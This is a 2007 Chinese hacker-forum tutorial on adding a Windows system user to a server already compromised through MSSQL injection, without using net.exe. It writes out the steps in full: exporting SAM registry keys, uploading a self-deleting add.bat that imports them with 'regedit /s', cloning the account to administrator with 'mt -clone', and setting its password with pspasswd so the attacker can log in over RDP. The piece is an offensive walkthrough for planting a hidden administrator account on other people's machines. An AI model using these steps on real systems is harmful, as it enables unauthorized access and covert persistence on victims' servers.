文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  当前位置:主页 > 技术文摘 > 入侵攻击 > 文章内容   您对新版的建议

实现无net.exe和net1.exe添加系统用户


www.hx99.org 阅读: 时间:2007-08-08 整理:华西黑盟
------------------------------------------------------------------
 鬼仔注:老文章了,以前没发过。

来源:hackest[H.S.T]

大家都知道在windows下添加用户可以在CMD下用net命令来实现
格式为:net user username password /add
意思为添加一个用户名为username密码为password的用户
如果要添加进管理员组还可以用如下命令来实现
net localgroup administrators username /add
这样就把用户名为username的用户加进了管理员组

但是如果不用net.exe和net1.exe是不是就无法添加系统用户了呢?
答案是否定的!

假设我们现在手上有一个SA权限的MSSQL注入点
3389开放并允许连接登录
可以通过注入工具执行任意命令
但是管理员把net.exe和net1.exe改名或者直接删除掉了
当然这样是可以通过上传自己的net.exe和net1.exe再执行添加用户命令
但是为了说明这种方法,我们不采用上传net.exe和net1.exe的方法来解决!

首先要做的就是本地新建一个用户
比如在本地添加一个用户名为hackest的用户
然后导出如下注册表内容:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\hackest
保存为hackest.reg

再导出注册表内容:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\下与hackest相对应的键值
比如是000003F6
就导出:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\000003F6
保存为000003F6.reg

然后再写一个批处理文件,名为add.bat
add.bat文件内容如下:

regedit /s hackest.reg
regedit /s 000003F6.reg
del hackest.reg
del 000003F6.reg
del add.bat

把这三个文件:hackest.reg、000003F6.reg、add.bat传到目标服务器上
运行add.bat文件

上传mt.exe运行mt -chkuser命令
我们会发现已经成功添加了一个用户名为hackest的用户
但是它并不属于任何成员组
所以得把它克隆成管理员
假设管理员用户为administrator,则命令为:
mt -clone administrator hackest
成功克隆为管理员后是不是就可以登录3389了呢?
其实现在还不可以的
因为这个用户的密码问题还没有解决

我们可以用PS系列工具中的pspasswd.exe来解决密码问题
命令格式为:
pspasswd.exe username newpassword
在此例中命令则为:
pspasswd.exe hackest hackest
这样就把用户名为hackest的用户密码更改为hackest了
现在你可以放心地去连接登录3389了,呵呵

其实完全可以通过上传net.exe或net1.exe再执行添加用户的操作来达到目的
不过在这里只是为大家提供一个完全可以不用那两个文件一样能添加用户的思路!
   ---------------------------------------------------------------------------------------------------
  上一篇:[转载]一次垃圾地入侵日记
  下一篇:无<>跨站一例——kevin blog跨站解析
   ---------------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
密码失而复得 RAR文件密码
破解WEP无线网络密码详细
一次局域网入侵全过程-完
黑客如何破坏杀毒软件
入侵董燕妮个人网站全过程
破解密码相关心理学知识
经典入侵检测术语全接触
Ms08-067 Exp 详细测试流
Cookies的注入方法和原理
另类破解双系统Vista密码
资深黑客浅谈文件捆绑技术
渗透韩国服务器
免杀技术详解
新的挂马方式ARP欺骗挂马
入侵超变态动网论坛
社会工程学的全方位讲解与
PcShare 免杀 附加数据
SQL注射修改难猜解的MD5
利用WEBSHELL直接进入后台
上网特权我来定
使用CSS进行的攻击
利用MS08-058攻击Google
跨站跨出WEBSHELL
多思路WEB入侵
检测周杰伦官方网站
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号